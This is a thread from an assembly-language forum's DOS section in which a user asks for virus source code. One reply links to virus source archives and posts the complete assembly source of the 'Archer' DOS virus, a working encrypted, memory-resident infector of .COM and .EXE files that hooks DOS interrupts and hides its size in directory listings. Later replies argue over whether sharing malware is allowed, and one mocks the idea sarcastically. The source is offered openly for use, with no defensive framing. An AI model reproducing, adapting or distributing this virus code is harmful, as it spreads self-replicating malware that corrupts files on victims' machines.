flat assembler
Message board for the users of flat assembler.

Index > DOS > Executable Virus, INTRUDER

Goto page 1, 2  Next
Author
Thread Post new topic Reply to topic
cognnav



Joined: 17 Jul 2014
Posts: 8
cognnav 17 Jul 2014, 17:32
I need the INTRUDER Virus code. People who know, please give me. Thank you very much.

_________________
NgocIT
Post 17 Jul 2014, 17:32
View user's profile Send private message Reply with quote
CandyMan



Joined: 04 Sep 2009
Posts: 413
Location: film "CandyMan" directed through Bernard Rose OR Candy Shop
CandyMan 17 Jul 2014, 18:14

_________________
smaller is better


Last edited by CandyMan on 22 Jul 2014, 20:33; edited 1 time in total
Post 17 Jul 2014, 18:14
View user's profile Send private message Reply with quote
cognnav



Joined: 17 Jul 2014
Posts: 8
cognnav 18 Jul 2014, 01:25
I want its code. I can't find from your links. Can you give me the code?
Post 18 Jul 2014, 01:25
View user's profile Send private message Reply with quote
iz56



Joined: 17 Jun 2011
Posts: 7
Location: rus
iz56 18 Jul 2014, 03:46
Disassembler?
Post 18 Jul 2014, 03:46
View user's profile Send private message Visit poster's website Reply with quote
cognnav



Joined: 17 Jul 2014
Posts: 8
cognnav 18 Jul 2014, 04:43
Oh, but it takes very long time and is not very exact. I need file .ASM, it is my exercise. I have to read and understand it.
Post 18 Jul 2014, 04:43
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20299
Location: In your JS exploiting you and your system
revolution 18 Jul 2014, 04:55
Virus source codes are not the easiest of things to find. Perhaps you can contact the author and play him/her to send you the files. If not, then ... disassembler.
Post 18 Jul 2014, 04:55
View user's profile Send private message Visit poster's website Reply with quote
cognnav



Joined: 17 Jul 2014
Posts: 8
cognnav 18 Jul 2014, 05:04
Thank all.
CandyMan can send me file?
Post 18 Jul 2014, 05:04
View user's profile Send private message Reply with quote
CandyMan



Joined: 04 Sep 2009
Posts: 413
Location: film "CandyMan" directed through Bernard Rose OR Candy Shop
CandyMan 18 Jul 2014, 13:27
I recommend disassembler of my authorship http://board.flatassembler.net/topic.php?p=109397#109397

_________________
smaller is better
Post 18 Jul 2014, 13:27
View user's profile Send private message Reply with quote
cognnav



Joined: 17 Jul 2014
Posts: 8
cognnav 19 Jul 2014, 04:36
OK, thanks.
Post 19 Jul 2014, 04:36
View user's profile Send private message Reply with quote
CandyMan



Joined: 04 Sep 2009
Posts: 413
Location: film "CandyMan" directed through Bernard Rose OR Candy Shop
CandyMan 21 Jul 2014, 17:58
you can find source codes of viruses here http://vxheavens.com/src.php or here http://en.pudn.com/sourcecode/kill-virus/download27.html
see also code:
Code:
; archer.asm : [Archer] MnemoniX `94
; Created with Biological Warfare - Version 0.90รก by MnemoniX

PING            equ     0AE3Bh
PONG            equ     0CD28h
STAMP           equ     30
MARKER          equ     04D4Dh

code            segment
                org     0
                assume  cs:code,ds:code

start:
                db      0E9h,3,0          ; to virus
host:
                db      0CDh,20h,0        ; host program
virus_begin:

                db      0BBh                    ; decryption module
code_offset     dw      offset virus_code
                mov     dx,VIRUS_SIZE / 2 + 1

decrypt:
                db      02Eh,081h,07h           ; ADD CS:[BX]
cipher          dw      0
                inc     bx
                inc     bx
                dec     dx
                jnz     decrypt


virus_code:
                call    $ + 3             ; BP is instruction ptr.
                pop     bp
                sub     bp,offset $ - 1

                push    ds es

                mov     ax,PING           ; test for residency
                int     21h
                cmp     bx,PONG
                je      installed

                mov     ax,es                   ; Get PSP
                dec     ax
                mov     ds,ax                   ; Get MCB

                sub     word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
                sub     word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
                mov     es,word ptr ds:[12h]

                push    cs                      ; copy virus into memory
                pop     ds
                xor     di,di
                mov     si,bp
                mov     cx,(virus_end - start) / 2 + 1
                rep     movsw

                xor     ax,ax                   ; capture interrupts
                mov     ds,ax

                sub     word ptr ds:[413h],(MEM_SIZE+1023) / 1024

                mov     si,21h * 4              ; get original int 21
                mov     di,offset old_int_21
                movsw
                movsw

                mov     word ptr ds:[si - 4],offset new_int_21
                mov     ds:[si - 2],es          ; and set new int 21

installed:
                call    activate                ; activation routine

                pop     es ds                   ; restore segregs
                cmp     sp,MARKER               ; check for .EXE
                je      exe_exit

com_exit:
                lea     si,[bp + host]          ; restore host program
                mov     di,100h
                push    di
                movsw
                movsb

                call    fix_regs                ; fix up registers
                ret                             ; and leave
exe_exit:
                mov     ax,ds                   ; fix up return address
                add     ax,10h
                add     ax,cs:[bp + exe_cs]
                mov     cs:[bp + return_cs],ax

                mov     ax,cs:[bp + exe_ip]
                mov     cs:[bp + return_ip],ax
                mov     sp,[bp + exe_sp]        ; restore SP

                call    fix_regs                ; fix up registers
                db      0EAh                    ; back to host program
return_ip       dw      0
return_cs       dw      0

exe_cs          dw      -16                     ; orig CS:IP
exe_ip          dw      103h
exe_sp          dw      -2                      ; orig SP

fix_regs:
                xor     ax,ax
                cwd
                xor     bx,bx
                mov     si,100h
                xor     di,di
                ret

; interrupt 21 handler
int_21:
                pushf
                call    dword ptr cs:[old_int_21]
                ret

new_int_21:
                cmp     ax,PING                 ; residency test
                je      ping_pong
                cmp     ax,4B00h                ; execute program
                je      execute
                cmp     ah,3Dh                  ; file open
                je      file_open
                cmp     ah,11h                  ; directory stealth
                je      dir_stealth
                cmp     ah,12h
                je      dir_stealth
int_21_exit:
                db      0EAh                    ; never mind ...
old_int_21      dd      0

ping_pong:
                mov     bx,PONG
                iret

dir_stealth:
                call    int_21                  ; get dir entry
                test    al,al
                js      dir_stealth_done

                push    ax bx es
                mov     ah,2Fh
                int     21h

                cmp     byte ptr es:[bx],-1     ; check for extended FCB
                jne     no_ext_FCB
                add     bx,7
no_ext_FCB:
                mov     ax,es:[bx + 17h]        ; check for infection marker
                and     al,31
                cmp     al,STAMP
                jne     dir_fixed

                sub     word ptr es:[bx + 1Dh],VIRUS_SIZE + 3
                sbb     word ptr es:[bx + 1Fh],0
dir_fixed:
                pop     es bx ax
dir_stealth_done:
                iret

file_open:
                push    ax cx di es
                call    get_extension
                cmp     [di],'OC'               ; .COM file?
                jne     perhaps_exe             ; perhaps .EXE then
                cmp     byte ptr [di + 2],'M'
                jne     not_prog
                jmp     a_program
perhaps_exe:
                cmp     [di],'XE'               ; .EXE file?
                jne     not_prog
                cmp     byte ptr [di + 2],'E'
                jne     not_prog
a_program:
                pop     es di cx ax
                jmp     execute                 ; infect file
not_prog:
                pop     es di cx ax
                jmp     int_21_exit

execute:
                push    ax bx cx dx si di ds es

                xor     ax,ax                   ; critical error handler
                mov     es,ax                   ; routine - catch int 24
                mov     es:[24h * 4],offset int_24
                mov     es:[24h * 4 + 2],cs

                mov     ax,4300h                ; change attributes
                int     21h

                push    cx dx ds
                xor     cx,cx
                call    set_attributes

                mov     ax,3D02h                ; open file
                call    int_21
                jc      cant_open
                xchg    bx,ax
                push    cs                      ; CS = DS
                pop     ds

                mov     ax,5700h                ; save file date/time
                int     21h
                push    cx dx
                mov     ah,3Fh
                mov     cx,28
                mov     dx,offset read_buffer
                int     21h

                cmp     word ptr read_buffer,'ZM' ; .EXE?
                je      infect_exe              ; yes, infect as .EXE

                mov     al,2                    ; move to end of file
                call    move_file_ptr

                cmp     dx,65279 - (VIRUS_SIZE + 3)
                ja      dont_infect             ; too big, don't infect

                sub     dx,VIRUS_SIZE + 3       ; check for previous infection
                cmp     dx,word ptr read_buffer + 1
                je      dont_infect

                add     dx,VIRUS_SIZE + 3
                mov     word ptr new_jump + 1,dx

                add     dx,103h
                call    encrypt_code            ; encrypt virus

                mov     dx,offset read_buffer   ; save original program head
                int     21h
                mov     ah,40h                  ; write virus to file
                mov     cx,VIRUS_SIZE
                mov     dx,offset encrypt_buffer
                int     21h

                xor     al,al                   ; back to beginning of file
                call    move_file_ptr

                mov     dx,offset new_jump      ; and write new jump
                int     21h

fix_date_time:
                pop     dx cx
                and     cl,-32                  ; add time stamp
                or      cl,STAMP                ; for directory stealth
                mov     ax,5701h                ; restore file date/time
                int     21h

close:
                pop     ds dx cx                ; restore attributes
                call    set_attributes

                mov     ah,3Eh                  ; close file
                int     21h

cant_open:
                pop     es ds di si dx cx bx ax
                jmp     int_21_exit             ; leave


set_attributes:
                mov     ax,4301h
                int     21h
                ret

dont_infect:
                pop     cx dx                   ; can't infect, skip
                jmp     close

move_file_ptr:
                mov     ah,42h                  ; move file pointer
                cwd
                xor     cx,cx
                int     21h

                mov     dx,ax                   ; set up registers
                mov     ah,40h
                mov     cx,3
                ret
infect_exe:
                cmp     word ptr read_buffer[26],0
                jne     dont_infect             ; overlay, don't infect

                cmp     word ptr read_buffer[16],MARKER
                je      dont_infect             ; infected already

                les     ax,dword ptr read_buffer[20]
                mov     exe_cs,es               ; CS
                mov     exe_ip,ax               ; IP

                mov     ax,word ptr read_buffer[16]
                mov     exe_sp,ax               ; SP
                mov     word ptr read_buffer[16],MARKER
                mov     ax,4202h                ; to end of file
                cwd
                xor     cx,cx
                int     21h

                push    ax dx                   ; save file size

                push    bx
                mov     cl,12                   ; calculate offsets for CS
                shl     dx,cl                   ; and IP
                mov     bx,ax
                mov     cl,4
                shr     bx,cl
                add     dx,bx
                and     ax,15
                pop     bx

                sub     dx,word ptr read_buffer[8]
                mov     word ptr read_buffer[22],dx
                mov     word ptr read_buffer[20],ax

                pop     dx ax                   ; calculate prog size

                add     ax,VIRUS_SIZE + 3
                adc     dx,0
                mov     cx,512                  ; in pages
                div     cx                      ; then save results
                inc     ax
                mov     word ptr read_buffer[2],dx
                mov     word ptr read_buffer[4],ax
                mov     dx,word ptr read_buffer[20]
                call    encrypt_code            ; encrypt virus


                mov     ah,40h
                mov     cx,VIRUS_SIZE + 3
                mov     dx,offset encrypt_buffer
                int     21h


                mov     ax,4200h                ; back to beginning
                cwd
                xor     cx,cx
                int     21h

                mov     ah,40h                  ; and fix up header
                mov     cx,28
                mov     dx,offset read_buffer
                int     21h
                jmp     fix_date_time           ; done

courtesy_of     db      '[BW]',0
signature       db      '[Archer] MnemoniX `94',0

activate:
                xor     ah,ah                   ; get system time
                int     1Ah
                cmp     dl,0F1h
                jb      no_activate

                mov     ah,0Fh                  ; get display page
                int     10h

                mov     al,dl                   ; random number, 0-15
                and     al,15

                mov     ah,3                    ; activating - get cursor
                int     10h                     ; position and save
                push    dx

                mov     dh,al                   ; set cursor at random
                xor     dl,dl                   ; row, column 1
                mov     ah,2
                int     10h

                mov     di,79
                mov     cx,1

arrow:
                mov     ax,91Ah                 ; print arrow and erase
                mov     bl,10                   ; 79 times
                int     10h

                push    cx                      ; time delay
                mov     cx,-200
                rep     lodsb
                pop     cx

                mov     ah,2
                mov     dl,' '
                int     21h

                dec     di
                jnz     arrow

                pop     dx                      ; reset cursor
                mov     ah,2
                int     10h                     ; and we're done

no_activate:
                ret

get_extension:
                push    ds                      ; find extension
                pop     es
                mov     di,dx
                mov     cx,64
                mov     al,'.'
                repnz   scasb
                ret

encrypt_code:
                push    ax cx

                push    dx
                xor     ah,ah                   ; get time for random number
                int     1Ah

                mov     cipher,dx               ; save encryption key
                pop     cx
                add     cx,virus_code - virus_begin
                mov     code_offset,cx          ; save code offset

                push    cs                      ; ES = CS
                pop     es

                mov     si,offset virus_begin   ; move decryption module
                mov     di,offset encrypt_buffer
                mov     cx,virus_code - virus_begin
                rep     movsb

                mov     cx,VIRUS_SIZE / 2 + 1
encrypt:
                lodsw                           ; encrypt virus code
                sub     ax,dx
                stosw
                loop    encrypt

                pop     cx ax
                ret

int_24:
                mov     al,3                    ; int 24 handler
                iret
new_jump        db      0E9h,0,0

virus_end:
VIRUS_SIZE      equ     virus_end - virus_begin
read_buffer     db      28 dup (?)              ; read buffer
encrypt_buffer  db      VIRUS_SIZE dup (?)      ; encryption buffer

end_heap:

MEM_SIZE        equ     end_heap - start

code            ends
                end     start
    

_________________
smaller is better
Post 21 Jul 2014, 17:58
View user's profile Send private message Reply with quote
KevinN



Joined: 09 Oct 2012
Posts: 160
KevinN 21 Jul 2014, 22:07
I thought that the RULE was not exchange about virus, malware etc on this website? Have the rules changed or have I deceived myself somehow?

I guess there is a benevolent purpose in security analysis in order to prevent people from suffering due to these exploits. I hope the one's here are not directing their wills to intentionally harm, frustrate, exploit, steal, endanger and so on.
Post 21 Jul 2014, 22:07
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20299
Location: In your JS exploiting you and your system
revolution 21 Jul 2014, 22:12
I think that for DOS it doesn't matter so much. The entire OS is not protected and very few people use it. The impact will likely be minimal.
Post 21 Jul 2014, 22:12
View user's profile Send private message Visit poster's website Reply with quote
KevinN



Joined: 09 Oct 2012
Posts: 160
KevinN 22 Jul 2014, 02:20
revolution wrote:
I think that for DOS it doesn't matter so much. The entire OS is not protected and very few people use it. The impact will likely be minimal.


Good point. Just hope this isn't making way to turn this place into a school for extremely cruel deeds.
Post 22 Jul 2014, 02:20
View user's profile Send private message Reply with quote
neville



Joined: 13 Jul 2008
Posts: 507
Location: New Zealand
neville 22 Jul 2014, 22:57
revolution wrote:
I think that for DOS it doesn't matter so much. The entire OS is not protected and very few people use it. The impact will likely be minimal.
That's fine, but the point is there are links to dozens of potentially harmful virii for Windows, Linux and other OS's in the URL's given above. So maybe reconsider... Shocked

_________________
FAMOS - the first memory operating system
Post 22 Jul 2014, 22:57
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20299
Location: In your JS exploiting you and your system
revolution 22 Jul 2014, 23:11
Links are easily findable with any search engine. I doubt anyone is coming here specifically to find malware.
Post 22 Jul 2014, 23:11
View user's profile Send private message Visit poster's website Reply with quote
neville



Joined: 13 Jul 2008
Posts: 507
Location: New Zealand
neville 23 Jul 2014, 10:17
revolution wrote:
Links are easily findable with any search engine. I doubt anyone is coming here specifically to find malware.
That's fine too, for now, but it also misses the point.

OK folks, you CAN post your malware here after all, and if you're not into the FUN world of malware yet, but maybe just curious, check out the links above... Study the source code, learn how to exploit the many vulnerabilities of your favourite operating system to unleash on the millions of DUMB gullible users out there who deserve to have their systems trashed, discover the huge variety of techniques to make self-replicating code do especially harmful and destructive things, and (if you are "clever" enough) devise some new ones of your very own Razz And come back later because there'll be even more malware here for you...

_________________
FAMOS - the first memory operating system
Post 23 Jul 2014, 10:17
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20299
Location: In your JS exploiting you and your system
revolution 23 Jul 2014, 11:00
Well then I guess it's troublesome to be a DOS user. Wink
Post 23 Jul 2014, 11:00
View user's profile Send private message Visit poster's website Reply with quote
neville



Joined: 13 Jul 2008
Posts: 507
Location: New Zealand
neville 23 Jul 2014, 11:10
revolution wrote:
Well then I guess it's troublesome to be a DOS user. Wink
or any other OS user Exclamation

_________________
FAMOS - the first memory operating system
Post 23 Jul 2014, 11:10
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20299
Location: In your JS exploiting you and your system
revolution 23 Jul 2014, 11:13
This section is for DOS. DOS is not a protected OS. So users of DOS can't expect any protection from their OS. DOS malware won't magically affect other protected OSes.
Post 23 Jul 2014, 11:13
View user's profile Send private message Visit poster's website Reply with quote
neville



Joined: 13 Jul 2008
Posts: 507
Location: New Zealand
neville 24 Jul 2014, 09:41
revolution wrote:
This section is for DOS.
DOS is not a protected OS.
So users of DOS can't expect any protection from their OS.
DOS malware won't magically affect other protected OSes.
So your first three statements are just stating the obvious.

Your last statement is definitely contentious, but of course the degree of contention depends on your definition of a "protected" os. So if you want to continue to argue that one, we will need to agree on that definition. But as I'm sure you know, a technically-satisfactory, comprehensive (and mutally-acceptable) definition could be a VERY hard ask Razz

But folks, irrespective of all that, it seems we are now collectively authorised to post any malware at all, here in the DOS section. If your malware is intended to affect any other OS, protected or otherwise, it will be magically ignored because it will be assumed to be for DOS, since you have posted it in the DOS section! Enjoy! Very Happy

_________________
FAMOS - the first memory operating system
Post 24 Jul 2014, 09:41
View user's profile Send private message Visit poster's website Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  
Goto page 1, 2  Next

< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2024, Tomasz Grysztar. Also on GitHub, YouTube.

Website powered by rwasa.